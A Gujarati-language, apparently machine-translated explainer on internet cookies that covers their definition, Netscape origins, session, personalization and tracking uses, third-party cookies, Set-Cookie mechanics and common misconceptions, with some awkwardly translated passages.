in ,

ઇન્ટરનેટ કૂકી: તે શું છે? વ્યાખ્યા, મૂળ, પ્રકાર અને ગોપનીયતા

કૂકીની ભૂમિકા શું છે, તે શું છે અને કૂકીઝના પ્રકારો શું છે? 🍪

ઇન્ટરનેટ કૂકી: તે શું છે? વ્યાખ્યા, મૂળ, પ્રકાર અને ગોપનીયતા
ઇન્ટરનેટ કૂકી: તે શું છે? વ્યાખ્યા, મૂળ, પ્રકાર અને ગોપનીયતા

Un કૂકી અથવા વેબ કૂકી (અથવા કૂકી, તરીકે સંક્ષિપ્ત સાક્ષી ક્વિબેકમાં) HTTP કોમ્યુનિકેશન પ્રોટોકોલ દ્વારા HTTP ક્લાયન્ટને HTTP સર્વર દ્વારા મોકલવામાં આવેલી માહિતીનો ક્રમ તરીકે વ્યાખ્યાયિત કરવામાં આવે છે, જે દરેક વખતે જ્યારે તે જ HTTP સર્વરને ચોક્કસ શરતો હેઠળ પૂછવામાં આવે ત્યારે તે પરત કરે છે.

કૂકી એ a ની સમકક્ષ છે ટર્મિનલ પર સંગ્રહિત નાની ટેક્સ્ટ ફાઇલ ઇન્ટરનેટ વપરાશકર્તાની. 20 વર્ષથી વધુ સમયથી અસ્તિત્વમાં છે, તેઓ વેબસાઈટ ડેવલપર્સને તેમના નેવિગેશનની સુવિધા આપવા અને ચોક્કસ કાર્યોને મંજૂરી આપવા માટે વપરાશકર્તા ડેટા સ્ટોર કરવાની મંજૂરી આપે છે. કૂકીઝ હંમેશા વધુ કે ઓછા વિવાદાસ્પદ રહી છે કારણ કે તેમાં અવશેષ વ્યક્તિગત માહિતી હોય છે જેનો તૃતીય પક્ષો દ્વારા સંભવિત રીતે શોષણ થઈ શકે છે.

તે વેબ સર્વર દ્વારા વેબ બ્રાઉઝરને HTTP હેડર તરીકે મોકલવામાં આવે છે જે દરેક વખતે જ્યારે તે સર્વરને એક્સેસ કરે છે ત્યારે તેને અપરિવર્તિત પરત કરે છે. કૂકીનો ઉપયોગ કરી શકાય છે એક પ્રમાણીકરણ, એક સત્ર (રાજ્ય જાળવણી), અને માટે વપરાશકર્તા વિશે ચોક્કસ માહિતી સંગ્રહિત કરો, જેમ કે સાઇટ પસંદગીઓ અથવા ઇલેક્ટ્રોનિક શોપિંગ કાર્ટની સામગ્રી. કૂકી શબ્દ પરથી આવ્યો છે જાદુઈ કૂકી, UNIX કમ્પ્યુટિંગમાં જાણીતો ખ્યાલ, જેણે બ્રાઉઝર કૂકીઝના વિચાર અને નામને પ્રેરણા આપી. કૂકીઝના કેટલાક વિકલ્પો અસ્તિત્વમાં છે, દરેકના પોતાના ઉપયોગો, ફાયદા અને ગેરફાયદા છે.

સરળ ટેક્સ્ટ ફાઇલો હોવાથી, કૂકીઝ એક્ઝેક્યુટેબલ નથી. તેઓ નથી ન તો સ્પાયવેર કે વાયરસ, જો કે કેટલીક સાઇટ્સની કૂકીઝ ઘણા એન્ટી-વાયરસ સૉફ્ટવેર દ્વારા શોધી કાઢવામાં આવે છે કારણ કે તે વપરાશકર્તાઓને જ્યારે તેઓ બહુવિધ સાઇટ્સની મુલાકાત લે છે ત્યારે તેમને ટ્રૅક કરવાની મંજૂરી આપે છે. 

મોટાભાગના આધુનિક બ્રાઉઝર વપરાશકર્તાઓને પરવાનગી આપે છે કૂકીઝ સ્વીકારવી કે નકારવી તે નક્કી કરો. વપરાશકર્તાઓ પણ કરી શકે છે કૂકીઝ કેટલો સમય સંગ્રહિત છે તે પસંદ કરો. જો કે, કૂકીઝનો સંપૂર્ણ અસ્વીકાર કેટલીક સાઇટ્સને બિનઉપયોગી બનાવે છે. ઉદાહરણ તરીકે, શૉપિંગ કાર્ટ અથવા સાઇટ્સ કે જેને ઓળખપત્ર (વપરાશકર્તા નામ અને પાસવર્ડ) નો ઉપયોગ કરીને લૉગિનની જરૂર હોય તે સ્ટોર કરો.

સામગ્રીઓનું કોષ્ટક

હિસ્ટોરિક

શબ્દ કૂકી અંગ્રેજી શબ્દ પરથી આવ્યો છે જાદુઈ કૂકી, જે ડેટાનું પેકેટ છે જે પ્રોગ્રામ મેળવે છે અને અપરિવર્તિત પરત કરે છે. જ્યારે આઈટીમાં કૂકીઝનો ઉપયોગ પહેલાથી જ થતો હતો લૌ મોન્ટુલી વેબ કોમ્યુનિકેશન્સમાં તેનો ઉપયોગ કરવાનો વિચાર હતો જૂન 1994 માં. તે સમયે, તેઓ નેટસ્કેપ કોમ્યુનિકેશન્સ દ્વારા કાર્યરત હતા, જેણે ક્લાયન્ટ માટે ઈ-કોમર્સ એપ્લિકેશન વિકસાવી હતી. કૂકીઝે સ્ટોરના વર્ચ્યુઅલ શોપિંગ કાર્ટ અમલીકરણની વિશ્વસનીયતાની સમસ્યાનો ઉકેલ આપ્યો.

જ્હોન ગિઆનાન્ડ્રિયા અને લૂ મોન્ટુલીએ તે જ વર્ષે નેટસ્કેપની પ્રથમ કૂકી સ્પષ્ટીકરણ લખી હતી. મોઝેક નેટસ્કેપનું સંસ્કરણ 0.9 બીટા, 13 ઓક્ટોબર, 1994 ના રોજ પ્રકાશિત, સંકલિત કૂકી ટેકનોલોજી (પોસ્ટ જુઓ). કૂકીઝનો પ્રથમ (બિન-પ્રાયોગિક) ઉપયોગ એ નક્કી કરવા માટે હતો કે નેટસ્કેપ વેબસાઈટના મુલાકાતીઓએ અગાઉ આ સાઈટની મુલાકાત લીધી હતી કે કેમ. મોન્ટુલીએ 1995માં કૂકી ટેક્નોલોજી માટે પેટન્ટ અરજી દાખલ કરી હતી અને યુએસ પેટન્ટ 5774670 મંજૂર કરવામાં આવી હતી. 1998 માં આપવામાં આવી હતી.

0.9માં નેટસ્કેપ 1994 બીટામાં અમલમાં મુકાયા બાદ, ઓક્ટોબર 2માં બહાર પાડવામાં આવેલ, ઇન્ટરનેટ એક્સપ્લોરર 1995માં કૂકીઝને એકીકૃત કરવામાં આવી હતી.

કૂકીઝની રજૂઆત હજુ સુધી લોકો માટે વ્યાપકપણે જાણીતી નથી. ખાસ કરીને, બ્રાઉઝર સેટિંગ્સમાં કૂકીઝ મૂળભૂત રીતે સ્વીકારવામાં આવી હતી, અને વપરાશકર્તાઓને તેમની હાજરી વિશે જાણ કરવામાં આવી ન હતી. કેટલાક લોકો 1995ના પ્રથમ ત્રિમાસિક ગાળાની આસપાસ કૂકીઝના અસ્તિત્વથી વાકેફ હતા, પરંતુ 12 ફેબ્રુઆરી, 1996ના રોજ ફાઈનાન્શિયલ ટાઈમ્સે એક લેખ પ્રકાશિત કર્યા પછી જ સામાન્ય લોકોએ તેમના અસ્તિત્વને સ્વીકાર્યું. તે જ વર્ષે, કૂકીઝને મીડિયાનું ઘણું ધ્યાન મળ્યું. શક્ય ગોપનીયતા ઘૂસણખોરીને કારણે. 1996 અને 1997માં અમેરિકન ફેડરલ ટ્રેડ કમિશનના બે પરામર્શમાં કૂકીઝના વિષય પર ચર્ચા કરવામાં આવી હતી.

સત્તાવાર કૂકી સ્પષ્ટીકરણનો વિકાસ પહેલેથી જ ચાલી રહ્યો હતો. સત્તાવાર સ્પષ્ટીકરણની પ્રથમ ચર્ચા એપ્રિલ 1995 માં www-talk મેઇલિંગ સૂચિ પર થઈ હતી. એક વિશેષ IETF કાર્યકારી જૂથની રચના કરવામાં આવી હતી. બ્રાયન બેહલેન્દોર્ફ અને ડેવિડ ક્રિસ્ટોલ દ્વારા અનુક્રમે HTTP વ્યવહારોમાં રાજ્યની રજૂઆત માટે બે વૈકલ્પિક દરખાસ્તો રજૂ કરવામાં આવી હતી, પરંતુ ક્રિસ્ટોલની આગેવાની હેઠળના જૂથે શરૂઆતના બિંદુ તરીકે નેટસ્કેપના સ્પષ્ટીકરણનો ઉપયોગ કરવાનું નક્કી કર્યું. ફેબ્રુઆરી 1996 માં, કાર્યકારી જૂથે નક્કી કર્યું કે તૃતીય પક્ષ કૂકીઝ ગોપનીયતા માટે નોંધપાત્ર ખતરો છે. જૂથ દ્વારા ઉત્પાદિત સ્પષ્ટીકરણ આખરે તરીકે પ્રકાશિત કરવામાં આવ્યું હતું આરએફસી 2109.

2014 ના અંતથી, અમે ઘણી સાઇટ્સ પર કૂકીઝ વિશે બેનર જોયે છે. ઓછામાં ઓછું એક બ્રાઉઝર એક્સ્ટેંશન છે જે પરવાનગી આપે છે બેનર પ્રદર્શિત નથી.

કૂકીઝ અને ઉપયોગોના પ્રકાર

સત્ર સંચાલન

કૂકીઝનો ઉપયોગ નેવિગેશન દરમિયાન યુઝર ડેટા જાળવવા માટે કરી શકાય છે, પણ બહુવિધ મુલાકાતોમાં પણ. ઇલેક્ટ્રોનિક શોપિંગ કાર્ટને અમલમાં મૂકવા માટે કૂકીઝ રજૂ કરવામાં આવી હતી, એક વર્ચ્યુઅલ ઉપકરણ જેમાં વપરાશકર્તા સાઇટ બ્રાઉઝ કરતી વખતે તે ખરીદવા માંગે છે તે વસ્તુઓ એકઠા કરી શકે છે.

આ દિવસોમાં, શોપિંગ કાર્ટ જેવી એપ્લિકેશનો સર્વર પર ડેટાબેઝમાં વસ્તુઓની સૂચિને સંગ્રહિત કરે છે, જે પ્રાધાન્યક્ષમ છે; તેમને કૂકીમાં જ સાચવવા કરતાં. વેબ સર્વર એક અનન્ય સત્ર ID ધરાવતી કૂકી મોકલે છે. વેબ બ્રાઉઝર પછી દરેક અનુગામી વિનંતી પર આ સત્ર ID પરત કરે છે અને બાસ્કેટમાંની વસ્તુઓ સાચવવામાં આવે છે અને આ જ અનન્ય સત્ર ID સાથે સંકળાયેલી હોય છે.

કૂકીઝનો વારંવાર ઉપયોગ ઓળખપત્રોનો ઉપયોગ કરીને સાઇટમાં લોગ ઇન કરવા માટે ઉપયોગી છે. ટૂંકમાં, વેબ સર્વર પ્રથમ એક અનન્ય સત્ર ID ધરાવતી કૂકી મોકલે છે. પછી વપરાશકર્તાઓ તેમના ઓળખપત્ર (સામાન્ય રીતે વપરાશકર્તા નામ અને પાસવર્ડ) પ્રદાન કરે છે. વેબ એપ્લિકેશન પછી સત્રને પ્રમાણિત કરે છે અને વપરાશકર્તાને સેવાને ઍક્સેસ કરવાની મંજૂરી આપે છે.

વૈયક્તિકરણ

કૂકીઝનો ઉપયોગ સાઇટના વપરાશકર્તા વિશેની માહિતીને યાદ રાખવા માટે, ભવિષ્યમાં તેને યોગ્ય સામગ્રી બતાવવા માટે કરી શકાય છે. ઉદાહરણ તરીકે, વેબ સર્વર તે વેબસાઇટ પર લૉગ ઇન કરવા માટે વપરાતું છેલ્લું વપરાશકર્તાનામ ધરાવતી કૂકી મોકલી શકે છે, જેથી ભવિષ્યની મુલાકાતો પર વપરાશકર્તાનામ પૂર્વ-સંબંધિત થઈ શકે.

ઘણી વેબસાઇટ્સ વપરાશકર્તાની પસંદગીઓના આધારે વૈયક્તિકરણ માટે કૂકીઝનો ઉપયોગ કરે છે. વપરાશકર્તાઓ તેમની પસંદગીઓને ફોર્મમાં પસંદ કરે છે અને તેને સર્વર પર સબમિટ કરે છે. સર્વર કૂકીમાં પસંદગીઓને એન્કોડ કરે છે અને તેને બ્રાઉઝર પર પાછું મોકલે છે. ત્યારબાદ, જ્યારે પણ વપરાશકર્તા આ સાઇટના પૃષ્ઠને ઍક્સેસ કરે છે, ત્યારે બ્રાઉઝર કૂકી પરત કરે છે અને તેથી પસંદગીઓની સૂચિ; સર્વર પછી વપરાશકર્તાની પસંદગીઓ અનુસાર પૃષ્ઠને કસ્ટમાઇઝ કરી શકે છે. ઉદાહરણ તરીકે, વિકિપીડિયા વેબસાઇટ તેના વપરાશકર્તાઓને તેઓ જે સાઇટ પસંદ કરે છે તેની ત્વચા પસંદ કરવાની મંજૂરી આપે છે. Google સર્ચ એન્જિન તેના વપરાશકર્તાઓને (જો તેઓ નોંધાયેલા ન હોય તો પણ) તેઓ દરેક પરિણામ પૃષ્ઠ પર જોવા માંગતા હોય તેવા પરિણામોની સંખ્યા પસંદ કરવાની મંજૂરી આપે છે.

ટ્રેકિંગ

ટ્રેકિંગ કૂકીઝનો ઉપયોગ ઇન્ટરનેટ વપરાશકર્તાઓની બ્રાઉઝિંગ આદતોને ટ્રેક કરવા માટે થાય છે. આ અંશતઃ કોમ્પ્યુટરના IP એડ્રેસનો ઉપયોગ કરીને પૃષ્ઠ માટે વિનંતી કરીને અથવા 'રેફરર' HTTP હેડરનો ઉપયોગ કરીને પણ કરી શકાય છે જે ક્લાયંટ દરેક વિનંતી સાથે મોકલે છે, પરંતુ કૂકીઝ વધુ ચોકસાઇ માટે પરવાનગી આપે છે. આ નીચેના ઉદાહરણની જેમ કરી શકાય છે:

  1. જો વપરાશકર્તા કોઈ સાઇટ પર કોઈ પૃષ્ઠને કૉલ કરે છે, અને વિનંતીમાં કૂકી નથી, તો સર્વર ધારે છે કે આ વપરાશકર્તા દ્વારા મુલાકાત લીધેલ પ્રથમ પૃષ્ઠ છે. સર્વર પછી રેન્ડમ સ્ટ્રિંગ બનાવે છે અને વિનંતી કરેલ પૃષ્ઠ સાથે તેને બ્રાઉઝર પર મોકલે છે.
  2. આ ક્ષણથી, જ્યારે પણ સાઇટના નવા પૃષ્ઠને કૉલ કરવામાં આવશે ત્યારે બ્રાઉઝર દ્વારા કૂકી આપમેળે મોકલવામાં આવશે. સર્વર હંમેશની જેમ પેજ મોકલશે, પરંતુ તે પેજના URL, તારીખ, વિનંતીનો સમય અને કૂકીને લોગ ફાઈલમાં પણ લોગ કરશે.

લોગ ફાઇલને જોઈને, તે પછી વપરાશકર્તાએ કયા પૃષ્ઠોની મુલાકાત લીધી છે અને કયા ક્રમમાં તે જોવાનું શક્ય છે. ઉદાહરણ તરીકે, જો ફાઇલમાં id=abc કૂકીનો ઉપયોગ કરીને કરવામાં આવેલી થોડી વિનંતીઓ હોય, તો તે સ્થાપિત કરી શકે છે કે આ બધી વિનંતીઓ એક જ વપરાશકર્તા તરફથી આવી છે. વિનંતી કરેલ URL, વિનંતીઓ સાથે સંકળાયેલ તારીખ અને સમય વપરાશકર્તાના બ્રાઉઝિંગને ટ્રૅક કરવાની મંજૂરી આપે છે.

તૃતીય-પક્ષ કૂકીઝ અને વેબ બીકન્સ, નીચે સમજાવેલ છે, ઉપરાંત વિવિધ સાઇટ્સ પર ટ્રેકિંગને સક્ષમ કરે છે. સિંગલ સાઇટ ટ્રેકિંગનો ઉપયોગ સામાન્ય રીતે આંકડાકીય હેતુઓ માટે થાય છે. તેનાથી વિપરીત, તૃતીય પક્ષ કૂકીઝનો ઉપયોગ કરીને વિવિધ સાઇટ્સ પર ટ્રેકિંગનો ઉપયોગ સામાન્ય રીતે જાહેરાત કંપનીઓ દ્વારા અનામી વપરાશકર્તા પ્રોફાઇલ્સ બનાવવા માટે કરવામાં આવે છે (જેનો ઉપયોગ પછી વપરાશકર્તાને કઈ જાહેરાતો બતાવવી જોઈએ તે નિર્ધારિત કરવા તેમજ તેને આ જાહેરાતોને અનુરૂપ ઇમેઇલ્સ મોકલવા માટે વપરાય છે — SPAM ).

કૂકીઝ ટ્રૅક કરવાથી વપરાશકર્તાની ગોપનીયતા પર આક્રમણ થવાનું જોખમ છે પરંતુ તે સરળતાથી કાઢી શકાય છે. મોટાભાગના આધુનિક બ્રાઉઝર્સમાં એપ્લિકેશન બંધ કરતી વખતે સતત કૂકીઝને આપમેળે કાઢી નાખવાનો વિકલ્પ શામેલ છે.

તૃતીય પક્ષ કૂકીઝ

વેબ પૃષ્ઠમાં સમાવિષ્ટ છબીઓ અને અન્ય ઑબ્જેક્ટ્સ પૃષ્ઠને હોસ્ટ કરતા સર્વર કરતાં અલગ સર્વર પર રહી શકે છે. પૃષ્ઠ પ્રદર્શિત કરવા માટે, બ્રાઉઝર આ તમામ ઑબ્જેક્ટ્સને ડાઉનલોડ કરે છે. મોટાભાગની વેબસાઇટ્સ વિવિધ સ્ત્રોતોમાંથી માહિતી ધરાવે છે. ઉદાહરણ તરીકે, જો તમે તમારા બ્રાઉઝરમાં www.example.com ટાઈપ કરો છો, તો પેજના ભાગ પર ઘણી વખત ઑબ્જેક્ટ્સ અથવા જાહેરાતો હશે જે વિવિધ સ્ત્રોતોમાંથી આવે છે, એટલે કે www. .example.com કરતાં અલગ ડોમેનમાંથી. "પ્રથમ" પક્ષ કૂકીઝ એ કૂકીઝ છે જે બ્રાઉઝરના સરનામાં બારમાં સૂચિબદ્ધ ડોમેન દ્વારા સેટ કરવામાં આવે છે. તૃતીય-પક્ષ કૂકીઝ એક પેજ ઑબ્જેક્ટ દ્વારા સેટ કરવામાં આવે છે જે અલગ ડોમેનમાંથી આવે છે.

મૂળભૂત રીતે, Mozilla Firefox, Microsoft Internet Explorer અને Opera જેવા બ્રાઉઝર થર્ડ-પાર્ટી કૂકીઝ સ્વીકારે છે, પરંતુ વપરાશકર્તાઓ તેમને બ્લોક કરવા માટે બ્રાઉઝર વિકલ્પોમાં સેટિંગ્સ બદલી શકે છે. તૃતીય-પક્ષ કૂકીઝમાં અંતર્ગત કોઈ સુરક્ષા જોખમ નથી કે જે વેબ કાર્યક્ષમતાને સક્ષમ કરે છે, જો કે તેનો ઉપયોગ વપરાશકર્તાઓને ટ્રૅક કરવા માટે પણ થાય છે. સાઇટથી સાઇટ પર.

ગૂગલ ક્રોમ સહિતના તમામ બ્રાઉઝર્સ માટે ઉપલબ્ધ ઘોસ્ટરી જેવા ટૂલ્સ તૃતીય પક્ષો વચ્ચેના એક્સચેન્જને અવરોધિત કરી શકે છે.

અમલીકરણ

વેબ બ્રાઉઝર અને વેબ પૃષ્ઠને હોસ્ટ કરતા સર્વર વચ્ચે સંભવિત ક્રિયાપ્રતિક્રિયા. સર્વર બ્રાઉઝરને કૂકી મોકલે છે અને જ્યારે તે બીજા પેજ પર કૉલ કરે છે ત્યારે બ્રાઉઝર તેને પાછું મોકલે છે.
વેબ બ્રાઉઝર અને વેબ પૃષ્ઠને હોસ્ટ કરતા સર્વર વચ્ચે સંભવિત ક્રિયાપ્રતિક્રિયા. સર્વર બ્રાઉઝરને કૂકી મોકલે છે અને જ્યારે તે બીજા પેજ પર કૉલ કરે છે ત્યારે બ્રાઉઝર તેને પાછું મોકલે છે.

કૂકીઝ એ વેબ સર્વર દ્વારા બ્રાઉઝરને મોકલવામાં આવતા ડેટાના નાના ટુકડાઓ છે. બ્રાઉઝર તેમને સર્વર પર અપરિવર્તિત પરત કરે છે, અન્યથા સ્ટેટલેસ HTTP ટ્રાન્ઝેક્શનમાં સ્ટેટ (ભૂતકાળની ઘટનાઓની સ્મૃતિ) રજૂ કરે છે. કૂકીઝ વિના, વેબ પૃષ્ઠની દરેક પુનઃપ્રાપ્તિ અથવા વેબ પૃષ્ઠના ઘટક એ એક અલગ ઘટના છે, જે સમાન સાઇટ પર કરવામાં આવેલી અન્ય વિનંતીઓથી સ્વતંત્ર છે. વેબ સર્વર દ્વારા સેટ કરવામાં સક્ષમ હોવા ઉપરાંત, જો બ્રાઉઝર દ્વારા સમર્થિત અને અધિકૃત હોય તો, JavaScript જેવી સ્ક્રિપ્ટીંગ ભાષાઓ દ્વારા કૂકીઝ પણ સેટ કરી શકાય છે.

સત્તાવાર કૂકી સ્પષ્ટીકરણ સૂચવે છે કે બ્રાઉઝર ઓછામાં ઓછી સંખ્યામાં કૂકીઝ સાચવવા અને ફરીથી મોકલવામાં સક્ષમ હોવા જોઈએ. ખાસ કરીને, બ્રાઉઝર દરેક ચાર કિલોબાઈટની ઓછામાં ઓછી 300 કૂકીઝ અને એક સર્વર અથવા ડોમેન માટે ઓછામાં ઓછી 20 કૂકીઝ સ્ટોર કરવા સક્ષમ હોવા જોઈએ.

ની કલમ 3.1 મુજબ આરએફસી 2965, કૂકી નામો કેસ-સંવેદનશીલ છે.

કૂકી તેની સમાપ્તિની તારીખનો ઉલ્લેખ કરી શકે છે, આ કિસ્સામાં કૂકી આ તારીખે કાઢી નાખવામાં આવશે. જો કૂકી સમાપ્તિ તારીખનો ઉલ્લેખ કરતી નથી, તો વપરાશકર્તા તેના બ્રાઉઝરમાંથી બહાર નીકળે કે તરત જ કૂકી કાઢી નાખવામાં આવે છે. તેથી, સમાપ્તિ તારીખનો ઉલ્લેખ કરવો એ કૂકીને બહુવિધ સત્રો દ્વારા જીવંત બનાવવાનો એક માર્ગ છે. આ કારણોસર, સમાપ્તિ તારીખ સાથેની કૂકીઝ હોવાનું કહેવાય છે સતત. એક ઉદાહરણ એપ્લિકેશન: વપરાશકર્તાઓએ તેમના શોપિંગ કાર્ટમાં મૂકેલી વસ્તુઓને રેકોર્ડ કરવા માટે છૂટક સાઇટ સતત કૂકીઝનો ઉપયોગ કરી શકે છે (વાસ્તવમાં, કૂકી વેચાણની સાઇટ પર ડેટાબેઝમાં સાચવેલી એન્ટ્રીનો સંદર્ભ આપી શકે છે, અને તમારા કમ્પ્યુટરમાં નહીં) . આ માધ્યમ દ્વારા, જો વપરાશકર્તાઓ ખરીદી કર્યા વિના તેમના બ્રાઉઝરને છોડી દે છે અને પછીથી તેના પર પાછા ફરે છે, તો તેઓ ફરીથી કાર્ટમાં વસ્તુઓ શોધી શકશે. જો આ કૂકીઝએ સમાપ્તિ તારીખ ન આપી હોય, તો જ્યારે બ્રાઉઝર બંધ હોય ત્યારે તે સમાપ્ત થઈ જશે, અને બાસ્કેટની સામગ્રી પરની માહિતી ગુમ થઈ જશે.

કૂકીઝ ચોક્કસ ડોમેન, સબડોમેન અથવા સર્વર પરના પાથ સુધી મર્યાદિત હોઈ શકે છે જેણે તેને બનાવ્યું છે.

વેબ પૃષ્ઠોનું ટ્રાન્સફર હાઇપરટેક્સ્ટ ટ્રાન્સફર પ્રોટોકોલ (HTTP) નો ઉપયોગ કરીને કરવામાં આવે છે. કૂકીઝની અવગણના કરીને, બ્રાઉઝર્સ વેબ સર્વર્સમાંથી પેજને કૉલ કરે છે જેને સામાન્ય રીતે ટૂંકું લખાણ મોકલીને કહેવાય છે HTTP વિનંતી. ઉદાહરણ તરીકે, www.example.org/index.html પૃષ્ઠને ઍક્સેસ કરવા માટે, બ્રાઉઝર્સ સર્વર www.example.org સાથે કનેક્ટ થાય છે અને આના જેવી લાગે તેવી વિનંતી મોકલે છે:

/index.html HTTP/1.1 હોસ્ટ મેળવો: www.example.org
નેવિગેટરસર્વર

સર્વર વિનંતી કરેલ પૃષ્ઠ મોકલીને પ્રતિસાદ આપે છે, તેના પહેલા એક સમાન ટેક્સ્ટ, આખું કહેવામાં આવે છે HTTP પ્રતિભાવ. આ પેકેટમાં બ્રાઉઝરને કૂકીઝ સ્ટોર કરવા માટે સૂચના આપતી લીટીઓ હોઈ શકે છે:

HTTP/1.1 200 OKસામગ્રી-પ્રકાર: ટેક્સ્ટ/htmlસેટ-કુકી: નામ=મૂલ્ય
(HTML પૃષ્ઠ)
નેવિગેટરસર્વર

સર્વર ફક્ત સેટ-કુકી લાઇન મોકલે છે, જો સર્વર ઇચ્છે છે કે બ્રાઉઝર કૂકી સ્ટોર કરે. Set-Cookie એ નામ=મૂલ્ય સ્ટ્રિંગને સંગ્રહિત કરવા અને સર્વર પર ભવિષ્યની તમામ વિનંતીઓમાં તેને પરત કરવા માટે બ્રાઉઝર માટેની વિનંતી છે. જો બ્રાઉઝર કૂકીઝને સપોર્ટ કરે છે અને બ્રાઉઝર વિકલ્પોમાં કૂકીઝ સક્ષમ છે, તો તે જ સર્વર પર કરવામાં આવેલી તમામ અનુગામી વિનંતીઓમાં કૂકીનો સમાવેશ કરવામાં આવશે. ઉદાહરણ તરીકે, સર્વર www.example.org ને નીચેની વિનંતી મોકલીને બ્રાઉઝર www.example.org/news.html પૃષ્ઠને કૉલ કરે છે:

મેળવો /news.html HTTP/1.1હોસ્ટ: www.example.orgCookie: name=valueAccept: */*
નેવિગેટરસર્વર

આ સમાન સર્વરમાંથી બીજા પૃષ્ઠ માટેની વિનંતી છે, અને તે ઉપરના પહેલા કરતા અલગ છે કારણ કે તેમાં એક સ્ટ્રિંગ છે જે સર્વરે અગાઉ બ્રાઉઝરને મોકલ્યું હતું. આના માટે આભાર, સર્વર જાણે છે કે આ વિનંતી પાછલી એક સાથે જોડાયેલ છે. સર્વર કૉલ કરેલ પૃષ્ઠ મોકલીને અને તેમાં અન્ય કૂકીઝ ઉમેરીને પ્રતિસાદ આપે છે.

કૂકીનું મૂલ્ય સર્વર દ્વારા નવી લાઇન Set-Cookie મોકલીને બદલી શકાય છે: નામ=new_value કૉલ કરેલા પૃષ્ઠના પ્રતિભાવમાં. પછી બ્રાઉઝર જૂના મૂલ્યને નવા સાથે બદલે છે.

સેટ-કુકી લાઇન સામાન્ય રીતે CGI પ્રોગ્રામ અથવા અન્ય સ્ક્રિપ્ટીંગ ભાષા દ્વારા બનાવવામાં આવે છે, HTTP સર્વર દ્વારા નહીં. એચટીટીપી સર્વર (ઉદાહરણ: અપાચે) ફક્ત પ્રોગ્રામનું પરિણામ (કૂકીઝ ધરાવતા હેડરથી આગળનો દસ્તાવેજ) બ્રાઉઝરમાં ટ્રાન્સમિટ કરશે.

કૂકીઝને JavaScript અથવા બ્રાઉઝરમાં ચાલતી અન્ય સમાન ભાષાઓ દ્વારા પણ સેટ કરી શકાય છે, એટલે કે સર્વર બાજુને બદલે ક્લાયન્ટ બાજુ પર. JavaScript માં, document.cookie ઑબ્જેક્ટનો ઉપયોગ આ હેતુ માટે થાય છે. ઉદાહરણ તરીકે, સ્ટેટમેન્ટ document.cookie = "temperature=20" "temperature" નામની અને 20 ની કિંમત સાથે કૂકી બનાવે છે.

google.com તરફથી HTTP પ્રતિસાદનું ઉદાહરણ, જે વિશેષતાઓ સાથે કૂકી સેટ કરે છે.
google.com તરફથી HTTP પ્રતિસાદનું ઉદાહરણ, જે વિશેષતાઓ સાથે કૂકી સેટ કરે છે.

નામ/મૂલ્યની જોડી ઉપરાંત, કૂકીમાં સમાપ્તિ તારીખ, પાથ, ડોમેન નામ અને ઇચ્છિત કનેક્શનનો પ્રકાર, એટલે કે સામાન્ય અથવા એન્ક્રિપ્ટેડ પણ હોઈ શકે છે. RFC 2965 એ પણ વ્યાખ્યાયિત કરે છે કે કૂકીઝમાં ફરજિયાત સંસ્કરણ નંબર હોવો જોઈએ, પરંતુ આ સામાન્ય રીતે અવગણવામાં આવે છે. આ ડેટા ભાગો name=new_value જોડીને અનુસરે છે અને અર્ધવિરામ દ્વારા અલગ પડે છે. ઉદાહરણ તરીકે, સર્વર દ્વારા સેટ-કુકી લાઇન મોકલીને કૂકી બનાવી શકાય છે: name=new_value; સમાપ્તિ = તારીખ; પાથ =/; domain=.example.org.

કૂકીઝ સમાપ્ત થાય છે અને પછી નીચેની પરિસ્થિતિઓમાં બ્રાઉઝર દ્વારા સર્વરને મોકલવામાં આવતી નથી:

  • જ્યારે બ્રાઉઝર બંધ હોય, જો કૂકી સતત ન હોય.
  • જ્યારે કૂકીની સમાપ્તિ તારીખ પસાર થઈ ગઈ હોય.
  • જ્યારે કૂકીની સમાપ્તિ તારીખ (સર્વર અથવા સ્ક્રિપ્ટ દ્વારા) ભૂતકાળની તારીખમાં બદલાઈ જાય છે.
  • જ્યારે બ્રાઉઝર વપરાશકર્તાની વિનંતી પર કૂકીને કાઢી નાખે છે.

ત્રીજી પરિસ્થિતિ સર્વર્સ અથવા સ્ક્રિપ્ટ્સને કૂકીને સ્પષ્ટપણે કાઢી નાખવાની મંજૂરી આપે છે. નોંધ કરો કે Google Chrome વેબ બ્રાઉઝર દ્વારા સામગ્રી સેટિંગ્સને ઍક્સેસ કરીને ચોક્કસ કૂકીની સમાપ્તિ તારીખ જાણવી શક્ય છે. કમ્પ્યુટર પર સાચવેલી કૂકી ઘણા દાયકાઓ સુધી ત્યાં જ રહી શકે છે જો તેને ભૂંસી નાખવાની કોઈ પ્રક્રિયા કરવામાં ન આવે.

સ્ટીરિયોટાઇપ્સ

ઇન્ટરનેટ પર તેમનો પરિચય થયો ત્યારથી, કૂકીઝ વિશેના ઘણા વિચારો ઇન્ટરનેટ અને મીડિયામાં ફરતા થયા છે. 1998 માં, યુનાઇટેડ સ્ટેટ્સ ડિપાર્ટમેન્ટ ઓફ એનર્જી કોમ્પ્યુટર ઘટના મોનિટરિંગ ટીમ, CIAC એ નક્કી કર્યું કે કૂકી સુરક્ષા નબળાઈઓ "આવશ્યક રીતે અસ્તિત્વમાં નથી" અને સમજાવ્યું કે "તમારી મુલાકાતોના મૂળ અને તમે મુલાકાત લીધેલ વેબ પૃષ્ઠોની વિગતો વિશેની માહિતી. વેબ સર્વરની લોગ ફાઈલોમાં પહેલાથી જ અસ્તિત્વમાં છે”. 2005 માં, જ્યુપિટર રિસર્ચે એક અભ્યાસના પરિણામો પ્રકાશિત કર્યા, જેમાં ઉત્તરદાતાઓની નોંધપાત્ર ટકાવારી નીચેના નિવેદનોને ધ્યાનમાં લે છે:

  • કૂકીઝ જેવી છે વાયરસ, તેઓ વપરાશકર્તાઓની હાર્ડ ડ્રાઈવોને સંક્રમિત કરે છે.
  • કૂકીઝ જનરેટ કરે છે પ્રગટ થવું.
  • કૂકીઝ મોકલવા માટે વપરાય છે સ્પામ.
  • કૂકીઝનો ઉપયોગ માત્ર જાહેરાત માટે થાય છે.

